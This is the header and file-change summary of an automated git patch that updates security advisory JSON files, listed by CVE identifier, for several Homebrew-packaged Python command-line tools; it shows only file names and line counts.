From d158617c0e40e42cb0ffcf22b72c2267f701894c Mon Sep 17 00:00:00 2001 From: BrewTestBot <1589480+BrewTestBot@users.noreply.github.com> Date: Thu, 10 Sep 2026 21:35:26 +0000 Subject: [PATCH] Matched advisory candidates (shard 1f) Base: 577c983824b680a1491c3f6b64629943617b82e4 --- advisories/BREW-apm-CVE-2013-1633.json | 10 +- advisories/BREW-apm-CVE-2014-1829.json | 10 +- advisories/BREW-apm-CVE-2014-1830.json | 10 +- advisories/BREW-apm-CVE-2015-2296.json | 10 +- advisories/BREW-apm-CVE-2015-8557.json | 10 +- advisories/BREW-apm-CVE-2016-9015.json | 10 +- advisories/BREW-apm-CVE-2017-18342.json | 10 +- advisories/BREW-apm-CVE-2018-1000518.json | 10 +- advisories/BREW-apm-CVE-2018-18074.json | 10 +- advisories/BREW-apm-CVE-2018-20060.json | 10 +- advisories/BREW-apm-CVE-2018-25091.json | 10 +- advisories/BREW-apm-CVE-2019-11236.json | 10 +- advisories/BREW-apm-CVE-2019-11324.json | 10 +- advisories/BREW-apm-CVE-2019-20477.json | 10 +- advisories/BREW-apm-CVE-2020-14343.json | 10 +- advisories/BREW-apm-CVE-2020-1747.json | 10 +- advisories/BREW-apm-CVE-2020-26137.json | 10 +- advisories/BREW-apm-CVE-2020-7212.json | 10 +- advisories/BREW-apm-CVE-2021-20270.json | 10 +- advisories/BREW-apm-CVE-2021-21330.json | 10 +- advisories/BREW-apm-CVE-2021-27291.json | 10 +- advisories/BREW-apm-CVE-2021-28363.json | 10 +- advisories/BREW-apm-CVE-2021-33503.json | 10 +- advisories/BREW-apm-CVE-2021-33880.json | 10 +- advisories/BREW-apm-CVE-2022-24439.json | 16 +-- advisories/BREW-apm-CVE-2022-40896.json | 10 +- advisories/BREW-apm-CVE-2022-40897.json | 10 +- advisories/BREW-apm-CVE-2023-26302.json | 10 +- advisories/BREW-apm-CVE-2023-26303.json | 10 +- advisories/BREW-apm-CVE-2023-32681.json | 10 +- advisories/BREW-apm-CVE-2023-37276.json | 10 +- advisories/BREW-apm-CVE-2023-40267.json | 16 +-- advisories/BREW-apm-CVE-2023-40590.json | 16 +-- advisories/BREW-apm-CVE-2023-41040.json | 16 +-- advisories/BREW-apm-CVE-2023-43804.json | 10 +- advisories/BREW-apm-CVE-2023-45803.json | 10 +- advisories/BREW-apm-CVE-2023-47627.json | 10 +- advisories/BREW-apm-CVE-2023-47641.json | 10 +- advisories/BREW-apm-CVE-2023-49081.json | 10 +- advisories/BREW-apm-CVE-2023-49082.json | 10 +- advisories/BREW-apm-CVE-2024-22190.json | 16 +-- advisories/BREW-apm-CVE-2024-23334.json | 10 +- advisories/BREW-apm-CVE-2024-23829.json | 10 +- advisories/BREW-apm-CVE-2024-27306.json | 10 +- advisories/BREW-apm-CVE-2024-30251.json | 10 +- advisories/BREW-apm-CVE-2024-35195.json | 10 +- advisories/BREW-apm-CVE-2024-3651.json | 10 +- advisories/BREW-apm-CVE-2024-37891.json | 10 +- advisories/BREW-apm-CVE-2024-42367.json | 10 +- advisories/BREW-apm-CVE-2024-47081.json | 10 +- advisories/BREW-apm-CVE-2024-52303.json | 10 +- advisories/BREW-apm-CVE-2024-52304.json | 10 +- advisories/BREW-apm-CVE-2024-6345.json | 10 +- advisories/BREW-apm-CVE-2025-43859.json | 10 +- advisories/BREW-apm-CVE-2025-47273.json | 10 +- advisories/BREW-apm-CVE-2025-50181.json | 10 +- advisories/BREW-apm-CVE-2025-50182.json | 10 +- advisories/BREW-apm-CVE-2025-53643.json | 10 +- advisories/BREW-apm-CVE-2025-66418.json | 10 +- advisories/BREW-apm-CVE-2025-66471.json | 10 +- advisories/BREW-apm-CVE-2025-68146.json | 16 +-- advisories/BREW-apm-CVE-2025-69223.json | 10 +- advisories/BREW-apm-CVE-2025-69224.json | 10 +- advisories/BREW-apm-CVE-2025-69225.json | 10 +- advisories/BREW-apm-CVE-2025-69226.json | 10 +- advisories/BREW-apm-CVE-2025-69227.json | 10 +- advisories/BREW-apm-CVE-2025-69228.json | 10 +- advisories/BREW-apm-CVE-2025-69229.json | 10 +- advisories/BREW-apm-CVE-2025-69230.json | 10 +- advisories/BREW-apm-CVE-2026-21226.json | 10 +- advisories/BREW-apm-CVE-2026-21441.json | 10 +- advisories/BREW-apm-CVE-2026-22701.json | 16 +-- advisories/BREW-apm-CVE-2026-22815.json | 10 +- advisories/BREW-apm-CVE-2026-25645.json | 10 +- advisories/BREW-apm-CVE-2026-31236.json | 16 +-- advisories/BREW-apm-CVE-2026-34513.json | 10 +- advisories/BREW-apm-CVE-2026-34514.json | 10 +- advisories/BREW-apm-CVE-2026-34515.json | 10 +- advisories/BREW-apm-CVE-2026-34516.json | 10 +- advisories/BREW-apm-CVE-2026-34517.json | 10 +- advisories/BREW-apm-CVE-2026-34518.json | 10 +- advisories/BREW-apm-CVE-2026-34519.json | 10 +- advisories/BREW-apm-CVE-2026-34520.json | 10 +- advisories/BREW-apm-CVE-2026-34525.json | 10 +- advisories/BREW-apm-CVE-2026-34993.json | 10 +- advisories/BREW-apm-CVE-2026-42215.json | 16 +-- advisories/BREW-apm-CVE-2026-42284.json | 16 +-- advisories/BREW-apm-CVE-2026-44243.json | 16 +-- advisories/BREW-apm-CVE-2026-44244.json | 16 +-- advisories/BREW-apm-CVE-2026-44431.json | 10 +- advisories/BREW-apm-CVE-2026-44432.json | 10 +- advisories/BREW-apm-CVE-2026-44641.json | 15 +-- advisories/BREW-apm-CVE-2026-4539.json | 10 +- advisories/BREW-apm-CVE-2026-45409.json | 10 +- advisories/BREW-apm-CVE-2026-46383.json | 15 +-- advisories/BREW-apm-CVE-2026-47265.json | 10 +- advisories/BREW-apm-CVE-2026-50269.json | 10 +- advisories/BREW-apm-CVE-2026-54273.json | 10 +- advisories/BREW-apm-CVE-2026-54274.json | 10 +- advisories/BREW-apm-CVE-2026-54275.json | 10 +- advisories/BREW-apm-CVE-2026-54276.json | 10 +- advisories/BREW-apm-CVE-2026-54277.json | 10 +- advisories/BREW-apm-CVE-2026-54278.json | 10 +- advisories/BREW-apm-CVE-2026-54279.json | 10 +- advisories/BREW-apm-CVE-2026-54280.json | 10 +- advisories/BREW-apm-CVE-2026-59881.json | 10 +- advisories/BREW-apm-CVE-2026-59890.json | 10 +- advisories/BREW-apm-CVE-2026-67322.json | 19 +++- advisories/BREW-apm-CVE-2026-67323.json | 21 ++-- advisories/BREW-apm-CVE-2026-67324.json | 11 ++- advisories/BREW-apm-CVE-2026-67325.json | 21 ++-- advisories/BREW-apm-CVE-2026-67326.json | 8 +- advisories/BREW-apm-CVE-2026-69097.json | 8 +- advisories/BREW-apm-CVE-2026-69243.json | 10 +- advisories/BREW-apm-CVE-2026-69244.json | 10 +- advisories/BREW-apm-CVE-2026-73619.json | 11 ++- advisories/BREW-apm-CVE-2026-73620.json | 11 ++- advisories/BREW-apm-CVE-2026-73621.json | 11 ++- advisories/BREW-apm-CVE-2026-73622.json | 11 ++- advisories/BREW-apm-CVE-2026-73623.json | 11 ++- advisories/BREW-apm-CVE-2026-73624.json | 8 +- advisories/BREW-apm-CVE-2026-73625.json | 11 ++- advisories/BREW-apm-CVE-2026-76217.json | 19 +++- advisories/BREW-apm-CVE-2026-76218.json | 19 +++- advisories/BREW-apm-CVE-2026-76219.json | 21 ++-- advisories/BREW-apm-CVE-2026-76220.json | 19 +++- advisories/BREW-apm-CVE-2026-76221.json | 16 +-- advisories/BREW-apm-CVE-2026-76222.json | 28 +++--- advisories/BREW-apm-CVE-2026-78675.json | 47 +++++++-- advisories/BREW-apm-CVE-2026-78676.json | 35 +++++-- advisories/BREW-apm-CVE-2026-78677.json | 47 +++++++-- advisories/BREW-apm-CVE-2026-78678.json | 33 +++++-- advisories/BREW-apm-CVE-2026-78679.json | 93 ++++++++++++++++++ advisories/BREW-borgmatic-CVE-2014-1829.json | 10 +- advisories/BREW-borgmatic-CVE-2014-1830.json | 10 +- advisories/BREW-borgmatic-CVE-2015-2296.json | 10 +- advisories/BREW-borgmatic-CVE-2016-9015.json | 10 +- advisories/BREW-borgmatic-CVE-2018-18074.json | 10 +- advisories/BREW-borgmatic-CVE-2018-20060.json | 10 +- advisories/BREW-borgmatic-CVE-2018-25091.json | 10 +- advisories/BREW-borgmatic-CVE-2019-11236.json | 10 +- advisories/BREW-borgmatic-CVE-2019-11324.json | 10 +- advisories/BREW-borgmatic-CVE-2020-26137.json | 10 +- advisories/BREW-borgmatic-CVE-2020-7212.json | 10 +- advisories/BREW-borgmatic-CVE-2021-28363.json | 10 +- advisories/BREW-borgmatic-CVE-2021-33503.json | 10 +- advisories/BREW-borgmatic-CVE-2023-32681.json | 10 +- advisories/BREW-borgmatic-CVE-2023-43804.json | 10 +- advisories/BREW-borgmatic-CVE-2023-45803.json | 10 +- advisories/BREW-borgmatic-CVE-2024-35195.json | 10 +- advisories/BREW-borgmatic-CVE-2024-3651.json | 10 +- advisories/BREW-borgmatic-CVE-2024-37891.json | 10 +- advisories/BREW-borgmatic-CVE-2024-47081.json | 10 +- advisories/BREW-borgmatic-CVE-2025-50181.json | 10 +- advisories/BREW-borgmatic-CVE-2025-50182.json | 10 +- advisories/BREW-borgmatic-CVE-2025-66418.json | 10 +- advisories/BREW-borgmatic-CVE-2025-66471.json | 10 +- advisories/BREW-borgmatic-CVE-2026-21441.json | 10 +- advisories/BREW-borgmatic-CVE-2026-25645.json | 10 +- advisories/BREW-borgmatic-CVE-2026-44431.json | 10 +- advisories/BREW-borgmatic-CVE-2026-44432.json | 10 +- advisories/BREW-borgmatic-CVE-2026-45409.json | 10 +- advisories/BREW-eralchemy-CVE-2012-0805.json | 10 +- advisories/BREW-eralchemy-CVE-2019-7164.json | 10 +- advisories/BREW-eralchemy-CVE-2019-7548.json | 10 +- advisories/BREW-esbonio-CVE-2009-5042.json | 10 +- advisories/BREW-esbonio-CVE-2018-1000518.json | 10 +- advisories/BREW-esbonio-CVE-2021-33880.json | 10 +- .../BREW-isponsorblocktv-CVE-2014-1829.json | 10 +- .../BREW-isponsorblocktv-CVE-2014-1830.json | 10 +- .../BREW-isponsorblocktv-CVE-2015-2296.json | 10 +- .../BREW-isponsorblocktv-CVE-2015-5237.json | 10 +- .../BREW-isponsorblocktv-CVE-2015-8557.json | 10 +- .../BREW-isponsorblocktv-CVE-2016-9015.json | 10 +- .../BREW-isponsorblocktv-CVE-2018-18074.json | 10 +- .../BREW-isponsorblocktv-CVE-2018-20060.json | 10 +- .../BREW-isponsorblocktv-CVE-2018-25091.json | 10 +- .../BREW-isponsorblocktv-CVE-2019-11236.json | 10 +- .../BREW-isponsorblocktv-CVE-2019-11324.json | 10 +- .../BREW-isponsorblocktv-CVE-2020-26137.json | 10 +- .../BREW-isponsorblocktv-CVE-2020-7212.json | 10 +- .../BREW-isponsorblocktv-CVE-2021-20270.json | 10 +- .../BREW-isponsorblocktv-CVE-2021-21330.json | 10 +- .../BREW-isponsorblocktv-CVE-2021-27291.json | 10 +- .../BREW-isponsorblocktv-CVE-2021-28363.json | 10 +- .../BREW-isponsorblocktv-CVE-2021-33503.json | 10 +- .../BREW-isponsorblocktv-CVE-2022-1941.json | 10 +- .../BREW-isponsorblocktv-CVE-2022-40896.json | 10 +- .../BREW-isponsorblocktv-CVE-2023-26302.json | 10 +- .../BREW-isponsorblocktv-CVE-2023-26303.json | 10 +- .../BREW-isponsorblocktv-CVE-2023-32681.json | 10 +- .../BREW-isponsorblocktv-CVE-2023-37276.json | 10 +- .../BREW-isponsorblocktv-CVE-2023-43804.json | 10 +- .../BREW-isponsorblocktv-CVE-2023-45803.json | 10 +- .../BREW-isponsorblocktv-CVE-2023-47627.json | 10 +- .../BREW-isponsorblocktv-CVE-2023-47641.json | 10 +- .../BREW-isponsorblocktv-CVE-2023-49081.json | 10 +- .../BREW-isponsorblocktv-CVE-2023-49082.json | 10 +- .../BREW-isponsorblocktv-CVE-2024-23334.json | 10 +- .../BREW-isponsorblocktv-CVE-2024-23829.json | 10 +- .../BREW-isponsorblocktv-CVE-2024-27306.json | 10 +- .../BREW-isponsorblocktv-CVE-2024-30251.json | 10 +- .../BREW-isponsorblocktv-CVE-2024-35195.json | 10 +- .../BREW-isponsorblocktv-CVE-2024-3651.json | 10 +- .../BREW-isponsorblocktv-CVE-2024-37891.json | 10 +- .../BREW-isponsorblocktv-CVE-2024-42367.json | 10 +- .../BREW-isponsorblocktv-CVE-2024-47081.json | 10 +- .../BREW-isponsorblocktv-CVE-2024-52303.json | 10 +- .../BREW-isponsorblocktv-CVE-2024-52304.json | 10 +- .../BREW-isponsorblocktv-CVE-2025-4565.json | 10 +- .../BREW-isponsorblocktv-CVE-2025-50181.json | 10 +- .../BREW-isponsorblocktv-CVE-2025-50182.json | 10 +- .../BREW-isponsorblocktv-CVE-2025-53643.json | 10 +- .../BREW-isponsorblocktv-CVE-2025-66418.json | 10 +- .../BREW-isponsorblocktv-CVE-2025-66471.json | 10 +- .../BREW-isponsorblocktv-CVE-2025-69223.json | 10 +- .../BREW-isponsorblocktv-CVE-2025-69224.json | 10 +- .../BREW-isponsorblocktv-CVE-2025-69225.json | 10 +- .../BREW-isponsorblocktv-CVE-2025-69226.json | 10 +- .../BREW-isponsorblocktv-CVE-2025-69227.json | 10 +- .../BREW-isponsorblocktv-CVE-2025-69228.json | 10 +- .../BREW-isponsorblocktv-CVE-2025-69229.json | 10 +- .../BREW-isponsorblocktv-CVE-2025-69230.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-0994.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-21441.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-22815.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-25645.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-34513.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-34514.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-34515.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-34516.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-34517.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-34518.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-34519.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-34520.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-34525.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-34993.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-44431.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-44432.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-4539.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-45409.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-47180.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-47183.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-47184.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-47265.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-48045.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-48487.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-50269.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-54273.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-54274.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-54275.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-54276.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-54277.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-54278.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-54279.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-54280.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-59881.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-69243.json | 10 +- .../BREW-isponsorblocktv-CVE-2026-69244.json | 10 +- advisories/BREW-jc-CVE-2015-8557.json | 10 +- advisories/BREW-jc-CVE-2021-20270.json | 10 +- advisories/BREW-jc-CVE-2021-27291.json | 10 +- advisories/BREW-jc-CVE-2022-40896.json | 10 +- advisories/BREW-jc-CVE-2026-4539.json | 10 +- advisories/BREW-oterm-CVE-2012-4571.json | 10 +- advisories/BREW-oterm-CVE-2012-5577.json | 10 +- advisories/BREW-oterm-CVE-2012-5578.json | 10 +- advisories/BREW-oterm-CVE-2014-1829.json | 10 +- advisories/BREW-oterm-CVE-2014-1830.json | 10 +- advisories/BREW-oterm-CVE-2014-3146.json | 16 +-- advisories/BREW-oterm-CVE-2015-2296.json | 10 +- advisories/BREW-oterm-CVE-2015-5237.json | 16 +-- advisories/BREW-oterm-CVE-2015-8557.json | 16 +-- advisories/BREW-oterm-CVE-2016-10075.json | 10 +- advisories/BREW-oterm-CVE-2016-9015.json | 10 +- advisories/BREW-oterm-CVE-2017-11424.json | 10 +- advisories/BREW-oterm-CVE-2017-18342.json | 10 +- advisories/BREW-oterm-CVE-2018-1000518.json | 10 +- advisories/BREW-oterm-CVE-2018-18074.json | 10 +- advisories/BREW-oterm-CVE-2018-19787.json | 16 +-- advisories/BREW-oterm-CVE-2018-20060.json | 10 +- advisories/BREW-oterm-CVE-2018-25091.json | 10 +- advisories/BREW-oterm-CVE-2019-11236.json | 10 +- advisories/BREW-oterm-CVE-2019-11324.json | 10 +- advisories/BREW-oterm-CVE-2019-20477.json | 10 +- advisories/BREW-oterm-CVE-2020-14343.json | 10 +- advisories/BREW-oterm-CVE-2020-1747.json | 10 +- advisories/BREW-oterm-CVE-2020-26137.json | 10 +- advisories/BREW-oterm-CVE-2020-27783.json | 16 +-- advisories/BREW-oterm-CVE-2020-7212.json | 10 +- advisories/BREW-oterm-CVE-2020-7694.json | 16 +-- advisories/BREW-oterm-CVE-2020-7695.json | 16 +-- advisories/BREW-oterm-CVE-2021-20270.json | 16 +-- advisories/BREW-oterm-CVE-2021-22570.json | 8 +- advisories/BREW-oterm-CVE-2021-27291.json | 16 +-- advisories/BREW-oterm-CVE-2021-28363.json | 10 +- advisories/BREW-oterm-CVE-2021-28957.json | 16 +-- advisories/BREW-oterm-CVE-2021-33503.json | 10 +- advisories/BREW-oterm-CVE-2021-33880.json | 10 +- advisories/BREW-oterm-CVE-2021-41945.json | 10 +- advisories/BREW-oterm-CVE-2021-43818.json | 16 +-- advisories/BREW-oterm-CVE-2022-1941.json | 16 +-- advisories/BREW-oterm-CVE-2022-2309.json | 16 +-- advisories/BREW-oterm-CVE-2022-29217.json | 10 +- advisories/BREW-oterm-CVE-2022-40896.json | 16 +-- advisories/BREW-oterm-CVE-2023-26302.json | 10 +- advisories/BREW-oterm-CVE-2023-26303.json | 10 +- advisories/BREW-oterm-CVE-2023-29159.json | 16 +-- advisories/BREW-oterm-CVE-2023-29483.json | 10 +- advisories/BREW-oterm-CVE-2023-30798.json | 16 +-- advisories/BREW-oterm-CVE-2023-32681.json | 10 +- advisories/BREW-oterm-CVE-2023-43804.json | 10 +- advisories/BREW-oterm-CVE-2023-43810.json | 16 +-- advisories/BREW-oterm-CVE-2023-45803.json | 10 +- advisories/BREW-oterm-CVE-2024-24762.json | 10 +- advisories/BREW-oterm-CVE-2024-34062.json | 10 +- advisories/BREW-oterm-CVE-2024-35195.json | 10 +- advisories/BREW-oterm-CVE-2024-3651.json | 16 +-- advisories/BREW-oterm-CVE-2024-37568.json | 16 +-- advisories/BREW-oterm-CVE-2024-37891.json | 10 +- advisories/BREW-oterm-CVE-2024-47081.json | 10 +- advisories/BREW-oterm-CVE-2024-47874.json | 16 +-- advisories/BREW-oterm-CVE-2024-53861.json | 10 +- advisories/BREW-oterm-CVE-2024-53981.json | 10 +- advisories/BREW-oterm-CVE-2025-43859.json | 10 +- advisories/BREW-oterm-CVE-2025-4565.json | 16 +-- advisories/BREW-oterm-CVE-2025-46656.json | 10 +- advisories/BREW-oterm-CVE-2025-50181.json | 10 +- advisories/BREW-oterm-CVE-2025-50182.json | 10 +- advisories/BREW-oterm-CVE-2025-53365.json | 16 +-- advisories/BREW-oterm-CVE-2025-53366.json | 16 +-- advisories/BREW-oterm-CVE-2025-54121.json | 16 +-- advisories/BREW-oterm-CVE-2025-59420.json | 16 +-- advisories/BREW-oterm-CVE-2025-61920.json | 16 +-- advisories/BREW-oterm-CVE-2025-62706.json | 16 +-- advisories/BREW-oterm-CVE-2025-62727.json | 16 +-- advisories/BREW-oterm-CVE-2025-65015.json | 16 +-- advisories/BREW-oterm-CVE-2025-66416.json | 16 +-- advisories/BREW-oterm-CVE-2025-66418.json | 10 +- advisories/BREW-oterm-CVE-2025-66471.json | 10 +- advisories/BREW-oterm-CVE-2025-68146.json | 16 +-- advisories/BREW-oterm-CVE-2025-68158.json | 16 +-- advisories/BREW-oterm-CVE-2026-0994.json | 16 +-- advisories/BREW-oterm-CVE-2026-21441.json | 10 +- advisories/BREW-oterm-CVE-2026-22701.json | 16 +-- advisories/BREW-oterm-CVE-2026-23490.json | 10 +- advisories/BREW-oterm-CVE-2026-23949.json | 10 +- advisories/BREW-oterm-CVE-2026-24486.json | 10 +- advisories/BREW-oterm-CVE-2026-25580.json | 16 +-- advisories/BREW-oterm-CVE-2026-25640.json | 16 +-- advisories/BREW-oterm-CVE-2026-25645.json | 10 +- advisories/BREW-oterm-CVE-2026-27932.json | 16 +-- advisories/BREW-oterm-CVE-2026-27962.json | 16 +-- advisories/BREW-oterm-CVE-2026-28490.json | 16 +-- advisories/BREW-oterm-CVE-2026-28498.json | 16 +-- advisories/BREW-oterm-CVE-2026-28684.json | 16 +-- advisories/BREW-oterm-CVE-2026-28802.json | 16 +-- advisories/BREW-oterm-CVE-2026-30922.json | 22 ++--- advisories/BREW-oterm-CVE-2026-32597.json | 10 +- advisories/BREW-oterm-CVE-2026-34450.json | 16 +-- advisories/BREW-oterm-CVE-2026-34452.json | 16 +-- advisories/BREW-oterm-CVE-2026-40347.json | 10 +- advisories/BREW-oterm-CVE-2026-41066.json | 16 +-- advisories/BREW-oterm-CVE-2026-41425.json | 16 +-- advisories/BREW-oterm-CVE-2026-41479.json | 16 +-- advisories/BREW-oterm-CVE-2026-42561.json | 10 +- advisories/BREW-oterm-CVE-2026-44431.json | 10 +- advisories/BREW-oterm-CVE-2026-44432.json | 10 +- advisories/BREW-oterm-CVE-2026-44681.json | 16 +-- advisories/BREW-oterm-CVE-2026-4539.json | 16 +-- advisories/BREW-oterm-CVE-2026-45409.json | 16 +-- advisories/BREW-oterm-CVE-2026-46678.json | 16 +-- advisories/BREW-oterm-CVE-2026-48522.json | 10 +- advisories/BREW-oterm-CVE-2026-48523.json | 10 +- advisories/BREW-oterm-CVE-2026-48524.json | 10 +- advisories/BREW-oterm-CVE-2026-48525.json | 10 +- advisories/BREW-oterm-CVE-2026-48526.json | 10 +- advisories/BREW-oterm-CVE-2026-48710.json | 16 +-- advisories/BREW-oterm-CVE-2026-48782.json | 16 +-- advisories/BREW-oterm-CVE-2026-48817.json | 16 +-- advisories/BREW-oterm-CVE-2026-48818.json | 16 +-- advisories/BREW-oterm-CVE-2026-48990.json | 16 +-- advisories/BREW-oterm-CVE-2026-49476.json | 16 +-- advisories/BREW-oterm-CVE-2026-49477.json | 16 +-- advisories/BREW-oterm-CVE-2026-49852.json | 16 +-- advisories/BREW-oterm-CVE-2026-52869.json | 16 +-- advisories/BREW-oterm-CVE-2026-52870.json | 16 +-- advisories/BREW-oterm-CVE-2026-53537.json | 10 +- advisories/BREW-oterm-CVE-2026-53538.json | 10 +- advisories/BREW-oterm-CVE-2026-53539.json | 10 +- advisories/BREW-oterm-CVE-2026-53540.json | 10 +- advisories/BREW-oterm-CVE-2026-54249.json | 16 +-- advisories/BREW-oterm-CVE-2026-54282.json | 16 +-- advisories/BREW-oterm-CVE-2026-54283.json | 16 +-- advisories/BREW-oterm-CVE-2026-58203.json | 8 +- advisories/BREW-oterm-CVE-2026-59884.json | 10 +- advisories/BREW-oterm-CVE-2026-59885.json | 10 +- advisories/BREW-oterm-CVE-2026-59886.json | 10 +- advisories/BREW-oterm-CVE-2026-59950.json | 16 +-- advisories/BREW-oterm-CVE-2026-7246.json | 8 +- advisories/BREW-oterm-CVE-2026-84378.json | 93 ++++++++++++++++++ advisories/BREW-oterm-CVE-2026-84379.json | 89 +++++++++++++++++ advisories/BREW-oterm-CVE-2026-84380.json | 89 +++++++++++++++++ advisories/BREW-oterm-CVE-2026-84381.json | 98 +++++++++++++++++++ advisories/BREW-oterm-CVE-2026-84382.json | 89 +++++++++++++++++ .../BREW-pass-git-helper-CVE-2014-1624.json | 10 +- .../BREW-pass-git-helper-CVE-2019-12761.json | 10 +- advisories/BREW-python-yq-CVE-2017-18342.json | 10 +- advisories/BREW-python-yq-CVE-2019-20477.json | 10 +- advisories/BREW-python-yq-CVE-2020-14343.json | 10 +- advisories/BREW-python-yq-CVE-2020-1747.json | 10 +- .../BREW-snowflake-cli-CVE-2012-4571.json | 10 +- .../BREW-snowflake-cli-CVE-2012-5577.json | 10 +- .../BREW-snowflake-cli-CVE-2012-5578.json | 10 +- .../BREW-snowflake-cli-CVE-2013-1633.json | 10 +- .../BREW-snowflake-cli-CVE-2013-4314.json | 10 +- .../BREW-snowflake-cli-CVE-2014-0012.json | 10 +- .../BREW-snowflake-cli-CVE-2014-1402.json | 10 +- .../BREW-snowflake-cli-CVE-2014-1829.json | 10 +- .../BREW-snowflake-cli-CVE-2014-1830.json | 10 +- .../BREW-snowflake-cli-CVE-2015-2296.json | 10 +- .../BREW-snowflake-cli-CVE-2015-5237.json | 10 +- .../BREW-snowflake-cli-CVE-2015-8557.json | 10 +- .../BREW-snowflake-cli-CVE-2016-10745.json | 10 +- .../BREW-snowflake-cli-CVE-2016-9015.json | 10 +- .../BREW-snowflake-cli-CVE-2017-11424.json | 10 +- .../BREW-snowflake-cli-CVE-2017-18342.json | 10 +- .../BREW-snowflake-cli-CVE-2018-1000807.json | 10 +- .../BREW-snowflake-cli-CVE-2018-1000808.json | 10 +- .../BREW-snowflake-cli-CVE-2018-18074.json | 10 +- .../BREW-snowflake-cli-CVE-2018-20060.json | 10 +- .../BREW-snowflake-cli-CVE-2018-25091.json | 10 +- .../BREW-snowflake-cli-CVE-2019-10906.json | 10 +- .../BREW-snowflake-cli-CVE-2019-11236.json | 10 +- .../BREW-snowflake-cli-CVE-2019-11324.json | 10 +- .../BREW-snowflake-cli-CVE-2019-20477.json | 10 +- .../BREW-snowflake-cli-CVE-2020-14343.json | 10 +- .../BREW-snowflake-cli-CVE-2020-1747.json | 10 +- .../BREW-snowflake-cli-CVE-2020-26137.json | 10 +- .../BREW-snowflake-cli-CVE-2020-28493.json | 10 +- .../BREW-snowflake-cli-CVE-2020-7212.json | 10 +- .../BREW-snowflake-cli-CVE-2021-20270.json | 10 +- .../BREW-snowflake-cli-CVE-2021-27291.json | 10 +- .../BREW-snowflake-cli-CVE-2021-28363.json | 10 +- .../BREW-snowflake-cli-CVE-2021-33503.json | 10 +- .../BREW-snowflake-cli-CVE-2022-1941.json | 10 +- .../BREW-snowflake-cli-CVE-2022-24439.json | 16 +-- .../BREW-snowflake-cli-CVE-2022-29217.json | 10 +- .../BREW-snowflake-cli-CVE-2022-40896.json | 10 +- .../BREW-snowflake-cli-CVE-2022-40897.json | 10 +- .../BREW-snowflake-cli-CVE-2022-40898.json | 10 +- .../BREW-snowflake-cli-CVE-2022-42965.json | 16 +-- .../BREW-snowflake-cli-CVE-2023-26302.json | 10 +- .../BREW-snowflake-cli-CVE-2023-26303.json | 10 +- .../BREW-snowflake-cli-CVE-2023-32681.json | 10 +- .../BREW-snowflake-cli-CVE-2023-34233.json | 16 +-- .../BREW-snowflake-cli-CVE-2023-40267.json | 16 +-- .../BREW-snowflake-cli-CVE-2023-40590.json | 16 +-- .../BREW-snowflake-cli-CVE-2023-41040.json | 16 +-- .../BREW-snowflake-cli-CVE-2023-43804.json | 10 +- .../BREW-snowflake-cli-CVE-2023-45803.json | 10 +- .../BREW-snowflake-cli-CVE-2024-22190.json | 16 +-- .../BREW-snowflake-cli-CVE-2024-22195.json | 10 +- .../BREW-snowflake-cli-CVE-2024-34064.json | 10 +- .../BREW-snowflake-cli-CVE-2024-35195.json | 10 +- .../BREW-snowflake-cli-CVE-2024-3651.json | 10 +- .../BREW-snowflake-cli-CVE-2024-37891.json | 10 +- .../BREW-snowflake-cli-CVE-2024-47081.json | 10 +- .../BREW-snowflake-cli-CVE-2024-49750.json | 16 +-- .../BREW-snowflake-cli-CVE-2024-53861.json | 10 +- .../BREW-snowflake-cli-CVE-2024-56201.json | 10 +- .../BREW-snowflake-cli-CVE-2024-56326.json | 10 +- .../BREW-snowflake-cli-CVE-2024-6345.json | 10 +- .../BREW-snowflake-cli-CVE-2025-24793.json | 16 +-- .../BREW-snowflake-cli-CVE-2025-24794.json | 16 +-- .../BREW-snowflake-cli-CVE-2025-24795.json | 16 +-- .../BREW-snowflake-cli-CVE-2025-27516.json | 10 +- .../BREW-snowflake-cli-CVE-2025-4565.json | 10 +- .../BREW-snowflake-cli-CVE-2025-47273.json | 10 +- .../BREW-snowflake-cli-CVE-2025-50181.json | 10 +- .../BREW-snowflake-cli-CVE-2025-50182.json | 10 +- .../BREW-snowflake-cli-CVE-2025-66418.json | 10 +- .../BREW-snowflake-cli-CVE-2025-66471.json | 10 +- .../BREW-snowflake-cli-CVE-2025-68146.json | 16 +-- .../BREW-snowflake-cli-CVE-2026-0994.json | 10 +- .../BREW-snowflake-cli-CVE-2026-15925.json | 11 ++- .../BREW-snowflake-cli-CVE-2026-21441.json | 10 +- .../BREW-snowflake-cli-CVE-2026-22701.json | 16 +-- .../BREW-snowflake-cli-CVE-2026-23949.json | 10 +- .../BREW-snowflake-cli-CVE-2026-24049.json | 10 +- .../BREW-snowflake-cli-CVE-2026-25645.json | 10 +- .../BREW-snowflake-cli-CVE-2026-27448.json | 10 +- 